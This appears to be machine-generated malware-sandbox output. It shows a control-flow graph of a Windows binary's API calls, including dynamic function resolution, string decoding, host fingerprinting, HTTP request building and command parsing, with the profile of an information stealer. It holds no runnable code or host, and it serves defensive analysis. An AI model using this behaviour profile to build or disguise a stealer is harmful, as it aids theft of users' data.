34 API calls 26828->26829 26830 402f65 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 402f7e 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 402f97 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 402fb0 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 402fc9 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 402fe2 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 402ffb 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 403014 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 40302d 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403046 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 40305f 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 403078 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403091 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 4030aa 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4030c3 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4030dc 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 4030f5 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 40310e 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403127 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403140 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403159 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403172 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 40318b 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 4031a4 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4031bd 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4031d6 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 4031ef 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403208 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403221 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 40323a 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 403253 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 40326c 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 403285 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 40329e 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 4032b7 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 4032d0 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 4032e9 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403302 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 40331b 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 403334 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 40334d 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 403366 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 40337f 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 403398 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 4033b1 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4033ca 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4033e3 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 4033fc 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 403415 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 40342e 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 403447 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 403460 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403479 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403492 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 4034ab 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4034c4 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4034dd 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 4034f6 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 40350f 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403528 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403541 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 40355a 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 403573 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 40358c 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 4035a5 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4035be 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4035d7 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 4035f0 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403609 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403622 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 40363b 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 403654 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 40366d 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 403686 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 40369f 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 4036b8 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 4036d1 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4036ea 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 403703 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 40371c 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 403735 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 40374e 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 403767 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 403780 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403799 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 4037b2 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 4037cb 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4037e4 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 4037fd 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 403816 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 40382f 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 403848 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 403861 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 40387a 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403893 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 4038ac 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4038c5 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4038de 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4038f7 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403910 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403929 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403942 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 40395b 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403974 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 40398d 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 4039a6 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 4039bf 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 4039d8 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 4039f1 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403a0a 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403a23 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403a3c 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403a55 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403a6e 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403a87 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403aa0 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403ab9 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403ad2 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403aeb 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403b04 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403b1d 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403b36 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403b4f 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403b68 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403b81 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403b9a 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403bb3 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403bcc 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403be5 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403bfe 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403c17 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403c30 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403c49 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403c62 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403c7b 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403c94 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403cad 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403cc6 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403cdf 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403cf8 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403d11 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403d2a 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403d43 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403d5c 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403d75 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403d8e 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403da7 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403dc0 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403dd9 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403df2 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403e0b 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403e24 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403e3d 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403e56 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403e6f 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403e88 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403ea1 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403eba 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403ed3 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403eec 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403f05 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 403f1e 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 403f37 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 403f50 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 403f69 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 403f82 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 403f9b 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 403fb4 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 403fcd 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 403fe6 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 403fff 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404018 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 404031 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 40404a 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 404063 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 40407c 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 404095 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4040ae 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4040c7 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4040e0 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 4040f9 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404112 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 40412b 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 404144 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 40415d 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404176 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 40418f 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4041a8 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4041c1 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4041da 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 4041f3 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 40420c 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 404225 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 40423e 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 404257 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 404270 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404289 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4042a2 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4042bb 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 4042d4 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 4042ed 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 404306 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 40431f 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404338 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 404351 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 40436a 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 404383 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 40439c 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4043b5 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 4043ce 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 4043e7 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 404400 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404419 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 404432 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 40444b 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 404464 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 40447d 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 404496 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 4044af 27265->27266 27267 4045c0 34 API calls 27266->27267 27268 4044c8 27267->27268 27269 4045c0 34 API calls 27268->27269 27270 4044e1 27269->27270 27271 4045c0 34 API calls 27270->27271 27272 4044fa 27271->27272 27273 4045c0 34 API calls 27272->27273 27274 404513 27273->27274 27275 4045c0 34 API calls 27274->27275 27276 40452c 27275->27276 27277 4045c0 34 API calls 27276->27277 27278 404545 27277->27278 27279 4045c0 34 API calls 27278->27279 27280 40455e 27279->27280 27281 4045c0 34 API calls 27280->27281 27282 404577 27281->27282 27283 4045c0 34 API calls 27282->27283 27284 404590 27283->27284 27285 4045c0 34 API calls 27284->27285 27286 4045a9 27285->27286 27287 419c10 27286->27287 27288 419c20 43 API calls 27287->27288 27289 41a036 8 API calls 27287->27289 27288->27289 27290 41a146 27289->27290 27291 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27289->27291 27292 41a153 8 API calls 27290->27292 27293 41a216 27290->27293 27291->27290 27292->27293 27294 41a298 27293->27294 27295 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27293->27295 27296 41a2a5 6 API calls 27294->27296 27297 41a337 27294->27297 27295->27294 27296->27297 27298 41a344 9 API calls 27297->27298 27299 41a41f 27297->27299 27298->27299 27300 41a4a2 27299->27300 27301 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27299->27301 27302 41a4ab GetProcAddress GetProcAddress 27300->27302 27303 41a4dc 27300->27303 27301->27300 27302->27303 27304 41a515 27303->27304 27305 41a4e5 GetProcAddress GetProcAddress 27303->27305 27306 41a612 27304->27306 27307 41a522 10 API calls 27304->27307 27305->27304 27308 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27306->27308 27309 41a67d 27306->27309 27307->27306 27308->27309 27310 41a686 GetProcAddress 27309->27310 27311 41a69e 27309->27311 27310->27311 27312 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27311->27312 27313 415ca3 27311->27313 27312->27313 27314 401590 27313->27314 27589 401670 27314->27589 27317 41a7a0 lstrcpy 27318 4015b5 27317->27318 27319 41a7a0 lstrcpy 27318->27319 27320 4015c7 27319->27320 27321 41a7a0 lstrcpy 27320->27321 27322 4015d9 27321->27322 27323 41a7a0 lstrcpy 27322->27323 27324 401663 27323->27324 27325 415510 27324->27325 27326 415521 27325->27326 27327 41a820 2 API calls 27326->27327 27328 41552e 27327->27328 27329 41a820 2 API calls 27328->27329 27330 41553b 27329->27330 27331 41a820 2 API calls 27330->27331 27332 415548 27331->27332 27333 41a740 lstrcpy 27332->27333 27334 415555 27333->27334 27335 41a740 lstrcpy 27334->27335 27336 415562 27335->27336 27337 41a740 lstrcpy 27336->27337 27338 41556f 27337->27338 27339 41a740 lstrcpy 27338->27339 27351 41557c 27339->27351 27340 41a740 lstrcpy 27340->27351 27341 41a8a0 lstrcpy 27341->27351 27342 415643 StrCmpCA 27342->27351 27343 4156a0 StrCmpCA 27344 4157dc 27343->27344 27343->27351 27346 41a8a0 lstrcpy 27344->27346 27345 41a7a0 lstrcpy 27345->27351 27347 4157e8 27346->27347 27348 41a820 2 API calls 27347->27348 27349 4157f6 27348->27349 27352 41a820 2 API calls 27349->27352 27350 415856 StrCmpCA 27350->27351 27353 415991 27350->27353 27351->27340 27351->27341 27351->27342 27351->27343 27351->27345 27351->27350 27356 401590 lstrcpy 27351->27356 27360 41a820 lstrlenA lstrcpy 27351->27360 27361 4152c0 29 API calls 27351->27361 27362 4151f0 23 API calls 27351->27362 27364 415a0b StrCmpCA 27351->27364 27376 41578a StrCmpCA 27351->27376 27378 41593f StrCmpCA 27351->27378 27355 415805 27352->27355 27354 41a8a0 lstrcpy 27353->27354 27357 41599d 27354->27357 27358 401670 lstrcpy 27355->27358 27356->27351 27359 41a820 2 API calls 27357->27359 27379 415811 27358->27379 27363 4159ab 27359->27363 27360->27351 27361->27351 27362->27351 27365 41a820 2 API calls 27363->27365 27366 415a16 Sleep 27364->27366 27367 415a28 27364->27367 27368 4159ba 27365->27368 27366->27351 27369 41a8a0 lstrcpy 27367->27369 27371 401670 lstrcpy 27368->27371 27370 415a34 27369->27370 27372 41a820 2 API calls 27370->27372 27371->27379 27373 415a43 27372->27373 27374 41a820 2 API calls 27373->27374 27375 415a52 27374->27375 27377 401670 lstrcpy 27375->27377 27376->27351 27377->27379 27378->27351 27379->26433 27381 417553 GetVolumeInformationA 27380->27381 27382 41754c 27380->27382 27383 417591 27381->27383 27382->27381 27384 4175fc GetProcessHeap HeapAlloc 27383->27384 27385 417619 27384->27385 27386 417628 wsprintfA 27384->27386 27387 41a740 lstrcpy 27385->27387 27388 41a740 lstrcpy 27386->27388 27389 415da7 27387->27389 27388->27389 27389->26454 27391 41a7a0 lstrcpy 27390->27391 27392 404899 27391->27392 27598 4047b0 27392->27598 27394 4048a5 27395 41a740 lstrcpy 27394->27395 27396 4048d7 27395->27396 27397 41a740 lstrcpy 27396->27397 27398 4048e4 27397->27398 27399 41a740 lstrcpy 27398->27399 27400 4048f1 27399->27400 27401 41a740 lstrcpy 27400->27401 27402 4048fe 27401->27402 27403 41a740 lstrcpy 27402->27403 27404 40490b InternetOpenA StrCmpCA 27403->27404 27405 404944 27404->27405 27406 404955 27405->27406 27407 404ecb InternetCloseHandle 27405->27407 27611 418b60 GetSystemTime lstrcpy lstrcpy 27406->27611 27410 404ee8 27407->27410 27409 404963 27612 41a920 lstrcpy lstrcpy lstrcatA 27409->27612 27606 409ac0 CryptStringToBinaryA 27410->27606 27413 404976 27415 41a8a0 lstrcpy 27413->27415 27421 40497f 27415->27421 27416 41a820 2 API calls 27417 404f05 27416->27417 27418 41a9b0 4 API calls 27417->27418 27420 404f1b 27418->27420 27419 404f27 moneypunct 27423 41a7a0 lstrcpy 27419->27423 27422 41a8a0 lstrcpy 27420->27422 27424 41a9b0 4 API calls 27421->27424 27422->27419 27435 404f57 27423->27435 27425 4049a9 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 4049b2 27426->27427 27428 41a9b0 4 API calls 27427->27428 27429 4049d1 27428->27429 27430 41a8a0 lstrcpy 27429->27430 27431 4049da 27430->27431 27613 41a920 lstrcpy lstrcpy lstrcatA 27431->27613 27433 4049f8 27434 41a8a0 lstrcpy 27433->27434 27436 404a01 27434->27436 27435->26457 27437 41a9b0 4 API calls 27436->27437 27438 404a20 27437->27438 27439 41a8a0 lstrcpy 27438->27439 27440 404a29 27439->27440 27441 41a9b0 4 API calls 27440->27441 27442 404a48 27441->27442 27443 41a8a0 lstrcpy 27442->27443 27444 404a51 27443->27444 27445 41a9b0 4 API calls 27444->27445 27446 404a7d 27445->27446 27614 41a920 lstrcpy lstrcpy lstrcatA 27446->27614 27448 404a84 27449 41a8a0 lstrcpy 27448->27449 27450 404a8d 27449->27450 27451 404aa3 InternetConnectA 27450->27451 27451->27407 27452 404ad3 HttpOpenRequestA 27451->27452 27454 404b28 27452->27454 27455 404ebe InternetCloseHandle 27452->27455 27456 41a9b0 4 API calls 27454->27456 27455->27407 27457 404b3c 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404b45 27458->27459 27615 41a920 lstrcpy lstrcpy lstrcatA 27459->27615 27461 404b63 27462 41a8a0 lstrcpy 27461->27462 27463 404b6c 27462->27463 27464 41a9b0 4 API calls 27463->27464 27465 404b8b 27464->27465 27466 41a8a0 lstrcpy 27465->27466 27467 404b94 27466->27467 27468 41a9b0 4 API calls 27467->27468 27469 404bb5 27468->27469 27470 41a8a0 lstrcpy 27469->27470 27471 404bbe 27470->27471 27472 41a9b0 4 API calls 27471->27472 27473 404bde 27472->27473 27474 41a8a0 lstrcpy 27473->27474 27475 404be7 27474->27475 27476 41a9b0 4 API calls 27475->27476 27477 404c06 27476->27477 27478 41a8a0 lstrcpy 27477->27478 27479 404c0f 27478->27479 27616 41a920 lstrcpy lstrcpy lstrcatA 27479->27616 27481 404c2d 27482 41a8a0 lstrcpy 27481->27482 27483 404c36 27482->27483 27484 41a9b0 4 API calls 27483->27484 27485 404c55 27484->27485 27486 41a8a0 lstrcpy 27485->27486 27487 404c5e 27486->27487 27488 41a9b0 4 API calls 27487->27488 27489 404c7d 27488->27489 27490 41a8a0 lstrcpy 27489->27490 27491 404c86 27490->27491 27617 41a920 lstrcpy lstrcpy lstrcatA 27491->27617 27493 404ca4 27494 41a8a0 lstrcpy 27493->27494 27495 404cad 27494->27495 27496 41a9b0 4 API calls 27495->27496 27497 404ccc 27496->27497 27498 41a8a0 lstrcpy 27497->27498 27499 404cd5 27498->27499 27500 41a9b0 4 API calls 27499->27500 27501 404cf6 27500->27501 27502 41a8a0 lstrcpy 27501->27502 27503 404cff 27502->27503 27504 41a9b0 4 API calls 27503->27504 27505 404d1f 27504->27505 27506 41a8a0 lstrcpy 27505->27506 27507 404d28 27506->27507 27508 41a9b0 4 API calls 27507->27508 27509 404d47 27508->27509 27510 41a8a0 lstrcpy 27509->27510 27511 404d50 27510->27511 27618 41a920 lstrcpy lstrcpy lstrcatA 27511->27618 27513 404d6e 27514 41a8a0 lstrcpy 27513->27514 27515 404d77 27514->27515 27516 41a740 lstrcpy 27515->27516 27517 404d92 27516->27517 27619 41a920 lstrcpy lstrcpy lstrcatA 27517->27619 27519 404db3 27620 41a920 lstrcpy lstrcpy lstrcatA 27519->27620 27521 404dba 27522 41a8a0 lstrcpy 27521->27522 27523 404dc6 27522->27523 27524 404de7 lstrlenA 27523->27524 27525 404dfa 27524->27525 27526 404e03 lstrlenA 27525->27526 27621 41aad0 27526->27621 27528 404e13 HttpSendRequestA 27529 404e32 InternetReadFile 27528->27529 27530 404e67 InternetCloseHandle 27529->27530 27535 404e5e 27529->27535 27532 41a800 27530->27532 27532->27455 27533 41a9b0 4 API calls 27533->27535 27534 41a8a0 lstrcpy 27534->27535 27535->27529 27535->27530 27535->27533 27535->27534 27626 41aad0 27536->27626 27538 4117c4 StrCmpCA 27539 4117d7 27538->27539 27540 4117cf ExitProcess 27538->27540 27541 4117e7 strtok_s 27539->27541 27555 4117f4 27541->27555 27542 4119c2 27542->26459 27543 41199e strtok_s 27543->27555 27544 4118ad StrCmpCA 27544->27555 27545 4118cf StrCmpCA 27545->27555 27546 4118f1 StrCmpCA 27546->27555 27547 411951 StrCmpCA 27547->27555 27548 411970 StrCmpCA 27548->27555 27549 411913 StrCmpCA 27549->27555 27550 411932 StrCmpCA 27550->27555 27551 41185d StrCmpCA 27551->27555 27552 41187f StrCmpCA 27552->27555 27553 41a820 lstrlenA lstrcpy 27553->27555 27554 41a820 2 API calls 27554->27543 27555->27542 27555->27543 27555->27544 27555->27545 27555->27546 27555->27547 27555->27548 27555->27549 27555->27550 27555->27551 27555->27552 27555->27553 27555->27554 27556->26465 27557->26467 27558->26473 27559->26475 27560->26481 27561->26483 27562->26487 27563->26491 27564->26495 27565->26501 27566->26503 27567->26507 27568->26520 27569->26525 27570->26524 27571->26521 27572->26524 27573->26541 27574->26527 27575->26531 27576->26532 27577->26537 27578->26543 27579->26545 27580->26552 27581->26554 27582->26578 27583->26582 27584->26581 27585->26577 27586->26581 27587->26591 27590 41a7a0 lstrcpy 27589->27590 27591 401683 27590->27591 27592 41a7a0 lstrcpy 27591->27592 27593 401695 27592->27593 27594 41a7a0 lstrcpy 27593->27594 27595 4016a7 27594->27595 27596 41a7a0 lstrcpy 27595->27596 27597 4015a3 27596->27597 27597->27317 27622 401030 27598->27622 27602 404838 lstrlenA 27625 41aad0 27602->27625 27604 404848 InternetCrackUrlA 27605 404867 27604->27605 27605->27394 27607 409af9 LocalAlloc 27606->27607 27608 404eee 27606->27608 27607->27608 27609 409b14 CryptStringToBinaryA 27607->27609 27608->27416 27608->27419 27609->27608 27610 409b39 LocalFree 27609->27610 27610->27608 27611->27409 27612->27413 27613->27433 27614->27448 27615->27461 27616->27481 27617->27493 27618->27513 27619->27519 27620->27521 27621->27528 27623 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27622->27623 27624 41aad0 27623->27624 27624->27602 27625->27604 27626->27538 27764 416ab1 902 API calls 27728 4069f3 7 API calls 27729 921525 strtok_s strtok_s lstrlen lstrcpy ctype 27790 91932a ??2@YAPAXI RaiseException allocator 27767 41cafe 219 API calls 5 library calls 27700 92140b strtok_s 27701 923823 6 API calls 27702 926c57 692 API calls 27732 926d18 646 API calls 27703 92102b StrCmpCA strtok_s lstrlen lstrcpy 26198 401190 26205 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26198->26205 26200 40119e 26201 4011cc 26200->26201 26207 417850 GetProcessHeap HeapAlloc GetUserNameA 26200->26207 26203 4011b7 26203->26201 26204 4011c4 ExitProcess 26203->26204 26206 417939 26205->26206 26206->26200 26208 4178c3 26207->26208 26208->26203 27768 923b7d 91 API calls 2 library calls 27769 926a40 6 API calls 27770 41ce9f 69 API calls __amsg_exit 27707 4088a4 RaiseException task __CxxThrowException@8 27708 4180a5 GetProcessHeap HeapFree 27771 92cd97 170 API calls setSBUpLow 27773 92be78 162 API calls 2 library calls 27735 41b9b0 RtlUnwind 27709 923823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27736 91fd67 152 API calls

                                      Control-flow Graph

                                      APIs
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
